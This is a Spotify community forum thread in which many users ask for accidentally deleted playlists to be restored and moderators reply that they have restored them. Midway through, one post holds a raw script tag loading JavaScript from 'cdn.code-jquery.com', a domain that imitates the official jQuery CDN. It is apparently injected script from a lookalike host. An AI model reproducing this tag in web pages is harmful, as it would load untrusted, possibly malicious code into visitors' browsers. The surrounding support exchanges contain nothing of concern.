Help Wizard

Step 1

NEXT STEP

Recover deleted playlist

Solved!

Recover deleted playlist

Know this is a long shot but.... I've accidentally deleted a playlist I've spent weeks working on. Is there any way of getting it back?

It's called 'Boat party' and there was about 100 songs on it. Thanks.

1,112 Replies

@medhat wrote:

Dear Kind Moderators 🙂

I have deleted my "Liked from Radio" list by accident, just 10 minutes ago...will you kindly help me restore it ?

Thank you very much,

best regards,

Medhat

All sorted!

Check out our Twitter for the latest updates on any service issues: @Spotifystatus

Problem solved? Click 'Accept as solution' to make it easier to find for others!

New to the Community? Check out our Community newbie tips

I've deleted mine just a couple minutes ago, I was trying to delete a song but extendedly delete the hole playlist.

I was wondering if mine could be restored swell, It's called "roosje".

@NielsLinden wrote:

I've deleted mine just a couple minutes ago, I was trying to delete a song but extendedly delete the hole playlist.

I was wondering if mine could be restored swell, It's called "roosje".

Done.

Check out our Twitter for the latest updates on any service issues: @Spotifystatus

Problem solved? Click 'Accept as solution' to make it easier to find for others!

Thank you!!

I don't even know what happened! I guess I accidentaly pressed the wrong button and deleted my playlist .. I would try to remember all the songs but there were 250 ( give or take ) songs on the playlist! Is there anything I can do to restore this?! I don't exactally remember the playlist name ;; I believe it was called MUSIC though .( yeah, yeah, I know very creative name right? ) 

Hello all!

I have just by a mistake deleted my favorite spotify playlist.. There were about 147 tracks on it and I have really worked a long time on it. Is it possible that I can recover it? The playlist was called "Rappe de rap". Can anyone please help me? 

JonasBach

Done!

Thank you!!

Hi! I accidentally deleted one of my playlists aswell. It's called, "September." and it had about 180 songs on it with 11 hours worth of fantastic music. Is there any way I could get it back? I deleted it about 10 minutes ago.

-Rithinay

@Rithinay wrote:

Hi! I accidentally deleted one of my playlists aswell. It's called, "September." and it had about 180 songs on it with 11 hours worth of fantastic music. Is there any way I could get it back? I deleted it about 10 minutes ago.

-Rithinay

Done.

I accidentally just deleted a playlist called Mid 90s Music Race

It had 45 songs on it. Can I get it back?

When you have a song highlighted in a playlsit and hit 'delete' it deletes the whole playlist =/

Hi atJOLO - I've just returned that playlist for you. 

However, I've not been able to replicate deleting a playlist like that. You just have one song highlighted and the whole playlist disappears?

It's possible that I thought I had the song highlighted when really the playlist was some how highlighted instead.

Either way, I feel like, since the playlist file still exists somewhere, there should be a built in way to recover playlists =D

Thank you for recovering it!!

Hi everyone, I just had the same probleme and accidentally deleted my playlist called "aout 2012" on which I worked hard and contained more that 7 hours music

Can anyone help with that? I don't thinkl any of my friends copied it...
Thanks a lot!

@acvuccino wrote:

Hi everyone, I just had the same probleme and accidentally deleted my playlist called "aout 2012" on which I worked hard and contained more that 7 hours music

Can anyone help with that? I don't thinkl any of my friends copied it...
Thanks a lot!

Done!

Thanks a LOT!!

Is it possible to get the playlist that is supposed to show all the songs have liked from radio back please, not sure why but its not currently showing in my playlists!

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>

i just lost my playlist called "everything" and i have no idea how to get it back. can anyone help me please!!, i tried attempting to make a new one but i cant remember all the songs that were on it 😞 

Hello, i accidentaly created a new playlist, tried to delete it and ended up deleting my main playlist. It had about 500 songs in it, and it was called "sounds". Can it be restored? I would love to have it back..

Regs, Kristian / eniggma

Im really upset and I don't even know how I did it. I deleted over 1400 songs I had on my playlist. Anyway to retrieve it before it's to late? Thanks everyone!

Suggested posts